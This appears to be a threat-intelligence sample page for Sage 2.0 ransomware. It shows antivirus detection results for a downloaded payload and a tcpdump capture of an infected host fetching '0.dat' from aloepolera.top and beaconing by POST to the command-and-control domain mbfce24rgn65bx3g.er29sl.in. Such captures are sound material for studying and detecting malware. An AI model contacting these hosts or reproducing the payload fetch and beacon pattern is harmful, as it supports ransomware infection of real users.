
Sage 2.0 Ransomware Malware Trojan Traffic Analysis Sample FULL PCAP File Download mbfce24rgn65bx3g.er29sl.in

Download Attachments

  • 1 pcap 0dat
    Date added: January 21, 2017 11:14 pm Added by: admin File size: 11 KB Downloads: 168
SHA256: 408e5e7d86d222882eab6a3f5cc71ccd9c2d98c74a6b321c761b7ef6f82c88ba
File name: read.php?f=0.dat.1
Detection ratio: 22 / 55
Analysis date: 2017-01-21 23:05:38 UTC
Kaspersky HEUR:Trojan.Win32.Generic 20170120
Malwarebytes Trojan.MalPack.VB 20170120
McAfee PWSZbot-FHN 20170120
McAfee-GW-Edition BehavesLike.Win32.Worm.tt 20170120
eScan Trojan.GenericKD.4185884 20170120
Microsoft Trojan:Win32/Dynamer!ac 20170120
Panda Trj/GdSda.A 20170120
Qihoo-360 HEUR/QVM03.0.A425.Malware.Gen 20170121
Sophos Troj/Zbot-LPS 20170120
Symantec ML.Relationship.HighConfidence [Infostealer.Limitail] 20170120
Tencent Win32.Trojan.Generic.Swba 20170121
TrendMicro TSPY_INFOSTEAL.RRG 20170121
TrendMicro-HouseCall TSPY_INFOSTEAL.RRG 20170121
VIPRE Trojan.Win32.Generic!BT 20170121
ViRobot Trojan.Win32.Infostealer.1854296[h] 20170121
Yandex Trojan.Injector!fxtPd0Ocb/U 20170120


2017-01-21 01:34:57.576124 IP 192.168.1.102.50646 > 84.200.34.99.80: Flags [P.], seq 0:293, ack 1, win 256, length 293: HTTP: GET /read.php?f=0.dat HTTP/1.1
E..M3.@....U...fT."c...Pa..F..3.P.......GET /read.php?f=0.dat HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: aloepolera.top
Connection: Keep-Alive


2017-01-21 01:35:24.493431 IP 192.168.1.102.61133 > 75.75.75.75.53: 13071+ A? mbfce24rgn65bx3g.er29sl.in. (44)
E..HG$.........fKKKK...5.4
.3............mbfce24rgn65bx3g.er29sl.in.....
2017-01-21 01:35:25.478850 IP 192.168.1.102.61134 > 75.75.75.75.53: 13071+ A? mbfce24rgn65bx3g.er29sl.in. (44)
E..HG%.........fKKKK...5.4
.3............mbfce24rgn65bx3g.er29sl.in.....
2017-01-21 01:35:26.479008 IP 192.168.1.102.61135 > 75.75.75.75.53: 13071+ A? mbfce24rgn65bx3g.er29sl.in. (44)
E..HG&.........fKKKK...5.4
.3............mbfce24rgn65bx3g.er29sl.in.....
2017-01-21 01:35:26.493504 IP 192.168.1.102.61133 > 75.75.76.76.53: 13071+ A? mbfce24rgn65bx3g.er29sl.in. (44)
E..H0......h...fKKLL...5.4      .3............mbfce24rgn65bx3g.er29sl.in.....
2017-01-21 01:35:26.782549 IP 192.168.1.102.50647 > 54.146.39.22.80: Flags [S], seq 4173774261, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.D@........f6.'....P.......... ................
2017-01-21 01:35:26.811246 IP 192.168.1.102.50647 > 54.146.39.22.80: Flags [.], ack 3223055681, win 256, length 0
E..(.E@........f6.'....P.......AP...e.........
2017-01-21 01:35:26.812435 IP 192.168.1.102.50647 > 54.146.39.22.80: Flags [P.], seq 0:93, ack 1, win 256, length 93: HTTP: POST / HTTP/1.1
E....F@....v...f6.'....P.......AP...2...POST / HTTP/1.1
Host: mbfce24rgn65bx3g.er29sl.in
Content-Length: 167
Connection: close

2017-01-21 01:35:27.478619 IP 192.168.1.102.61134 > 75.75.76.76.53: 13071+ A? mbfce24rgn65bx3g.er29sl.in. (44)
E..H0......g...fKKLL...5.4      .3............mbfce24rgn65bx3g.er29sl.in.....
2017-01-21 01:35:27.946618 IP 192.168.1.102.50647 > 54.146.39.22.80: Flags [.], ack 112, win 256, length 0
E..(.H@........f6.'....P........P...c.........
2017-01-21 01:35:27.947809 IP 192.168.1.102.50647 > 54.146.39.22.80: Flags [F.], seq 260, ack 112, win 256, length 0
E..(.I@........f6.'....P........P...c.........
2017-01-21 01:35:28.478763 IP 192.168.1.102.61135 > 75.75.76.76.53: 13071+ A? mbfce24rgn65bx3g.er29sl.in. (44)
E..H0......f...fKKLL...5.4      .3............mbfce24rgn65bx3g.er29sl.in.....
2017-01-21 01:35:28.776237 IP 192.168.1.102.50646 > 84.200.34.99.80: Flags [F.], seq 293, ack 274776, win 1180, length 0
E..(3.@........fT."c...Pa..k..dbP... 8........
2017-01-21 01:35:29.478828 IP 192.168.1.102.61134 > 75.75.75.75.53: 13071+ A? mbfce24rgn65bx3g.er29sl.in. (44)
E..HG*.........fKKKK...5.4
.3............mbfce24rgn65bx3g.er29sl.in.....
2017-01-21 01:35:31.479076 IP 192.168.1.102.61134 > 75.75.76.76.53: 13071+ A? mbfce24rgn65bx3g.er29sl.in. (44)
E..H0......d...fKKLL...5.4      .3............mbfce24rgn65bx3g.er29sl.in.....
2017-01-21 01:35:32.245715 IP 192.168.1.102.61136 > 75.75.75.75.53: 60353+ A? mbfce24rgn65bx3g.er29sl.in. (44)
E..HG,.........fKKKK...5.4Q..............mbfce24rgn65bx3g.er29sl.in.....
2017-01-21 01:35:32.265343 IP 192.168.1.102.50648 > 66.23.246.239.80: Flags [S], seq 1829708398, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4x.@........fB......Pm."n...... ..T..............
2017-01-21 01:35:32.316926 IP 192.168.1.102.50648 > 66.23.246.239.80: Flags [.], ack 1944042060, win 256, length 0
E..(x.@....     ...fB......Pm."os..LP.../.........
2017-01-21 01:35:32.317860 IP 192.168.1.102.50648 > 66.23.246.239.80: Flags [P.], seq 0:93, ack 1, win 256, length 93: HTTP: POST / HTTP/1.1
E...x.@........fB......Pm."os..LP.......POST / HTTP/1.1
Host: mbfce24rgn65bx3g.er29sl.in
Content-Length: 167
Connection: close
